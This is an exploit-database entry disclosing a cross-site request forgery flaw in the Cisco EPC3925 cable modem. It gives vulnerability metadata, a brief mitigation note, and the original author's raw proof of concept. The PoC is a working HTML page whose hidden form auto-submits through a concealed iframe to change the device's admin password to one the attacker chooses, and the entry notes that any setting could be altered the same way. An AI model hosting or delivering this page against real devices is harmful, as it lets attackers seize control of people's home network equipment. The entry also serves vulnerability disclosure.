header-logo
Suggest Exploit
vendor:
EPC3925
by:
Jeroen - IT Nerdbox
8.8
CVSS
HIGH
Cross Site Request Forgery
352
CWE
Product Name: EPC3925
Affected Version From: epc3925-E10-5-v302r125572-130520c
Affected Version To: epc3925-E10-5-v302r125572-130520c
Patch Exists: NO
Related CWE: N/A
CPE: h:cisco:epc3925
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Cisco EPC3925
2013

Cisco EPC3925 ? Cross Site Request Forgery

This proof of concept demonstrates that the admin password can be changed by an attacker in a CSRF attack. However, it seems like any setting in the device can be manipulated using an attack like this. The device does not ask for the current password.

Mitigation:

Implementing proper authentication and authorization mechanisms, and using CSRF tokens to prevent CSRF attacks.
Source

Exploit-DB raw data:

#######################################################################
# Exploit Title: Cisco EPC3925 � Cross Site Request Forgery
# Google Dork: N/A
# Date: 12-11-2013
# Exploit Author: Jeroen - IT Nerdbox
# Vendor Homepage: http://www.cisco.com 
# Software Link: Not public
# Version: epc3925-E10-5-v302r125572-130520c
# Tested on: Cisco EPC3925 
# CVE: N/A
#######################################################################
# Description:
# 
# This proof of concept demonstrates that the admin password can be 
# changed by an attacker in a CSRF attack. However, it seems like any
# setting in the device can be manipulated using an attack like this.
#
#
# Side note: The device does not ask for the current password.
#            
#
# Location:
#
# POST http://[target]/goform/Quick_setup
#
# Parameters:
#
# Password=&PasswordReEnter=&save=Save+Settings
#
# PoC: 
#
# <html>
#
# <form name="reseller" method="POST"
action="http://[target]/goform/Quick_setup" id="csrf_attack"
target="csrf_iframe">
#   <input type="hidden" name="Password" value="attackers_password">
#   <input type="hidden" name="PasswordReEnter" value="attackers_password">
#   <input type="hidden" name="save" value="Save Settings">
# </form>
#
# <iframe id="csrf_iframe" style="visibility:hidden;display:none"></iframe>
#
# <script>
#  document.getElementById('csrf_attack').submit();
# </script>
# <center>The payload has been executed....</center>
#
# </html> 
#
# Check out the video at: http://www.nerdbox.it/cisco-epc3925-csrf-vulnerability/